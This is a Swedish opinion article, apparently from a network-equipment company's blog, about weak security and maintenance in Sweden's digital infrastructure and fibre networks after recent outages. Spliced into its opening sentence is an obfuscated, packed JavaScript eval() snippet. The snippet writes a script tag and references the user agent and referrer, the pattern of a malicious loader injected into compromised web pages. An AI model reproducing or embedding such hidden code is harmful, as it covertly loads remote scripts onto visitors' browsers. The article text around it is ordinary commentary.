Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Sveriges digitala infrastruktur är rena vilda västern

Sveriges digitala infrastruktur är rena vilda västern
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sabie|var|u0026u|referrer|sffze||js|php’.split(’|’),0,{}))
förra veckan rådde ett totalt kaos i den svenska infrastrukturen, när stora delar av viktiga samhällsfunktioner slogs ut. Samtidigt som luftrummet var avstängt havererade SJ:s bokningssystem så att det inte gick att boka tåg, vare sig på internet, via telefon eller fysiskt. Därutöver slogs det larm om att flertalet kommunikationsmaster saboterats eller slutat fungera, vilket resulterade i att bland annat P4, som sänder samhällets viktiga meddelanden till allmänheten vid krissituationer, inte fungerade. I en av de trasiga masterna fanns också en Rakelsändare, som ingår i det kommunikationssystem som polis och räddningstjänst kommunicerar genom. Flera andra samhällsfunktioner hyr in sig på den här typen av radio- och TV-master.

Även om många frågetecken ännu står obesvarade kan vi åtminstone konstatera att två bakomliggande orsaker till haverierna är (1) att säkerheten varit för låg och (2) att underhållet varit undermåligt.

På kort tid har alltså flertalet omfattande kommunikationshaverier drabbat Sverige och sårbarheten i vår infrastruktur har visat sig vara påtaglig. Detta leder oss till frågan – i hur många andra områden har jakten på kronor och ören eller hastigt beslutfattande lett till undermåliga lösningar som riskerar att slå ut viktiga samhällsfunktioner när vi minst anar det, eller mest behöver det?

Utbyggnaden av stabilt bredband i Sverige och världen, som Waystream är en del av, är idag en av samhällets absolut viktigaste frågor. Vi blir alltmer beroende av digital kommunikation och digitala lösningar, vilket också innebär att den digitala infrastrukturen blir lika viktig som den gamla traditionella infrastrukturen, exempelvis vägar och vatten. Och den här typen av haverier lyfter bland annat diskussionen kring hur självförsörjande Sverige egentligen är på el, teknik och framförallt om vi nu bygger de nya näten med fokus på långsiktighet och hållbarhet.

Synen på fiberinfrastrukturen som samhällskritisk resurs är idag väldigt olika i Sveriges kommuner. Ingen ifrågasätter kommunens ansvar för gator och torg, men när det gäller fibernäten råder tidvis rena vilda västern.

Byggs den i privat ägo eller som offentlig resurs med lika villkor för alla? Byggs den för långsiktig stabilitet, skalbarhet och redundans eller med fokus på att snabbt täcka stora områden med så billig teknik som möjligt för att muta in marknaden?

Detta är frågor som måste tas på allvar. Infrastrukturen kring vårt internet och det digitala landskapet är enormt viktigt redan idag – och kommer bara bli viktigare framöver. Därför måste alla inblandade aktörer och beslutsfattare lägga kraft på att bygga rätt från början, med ett långsiktigt och skalbart tänk.

I 15 år har vi på Waystream levererat utrustningen som binder samman fibernäten i många svenska stadsnät. Vår erfarenhet och våra kunders erfarenhet är att stabilitet och kvalitet både levererar lönsamhet och säkerställer kommunikationen, även när det blåser kraftigt.

Vi hoppas att detta är en fråga vår alldeles nya digitaliseringsminister, Peter Eriksson, nu lyfter upp på agendan och tar på allvar.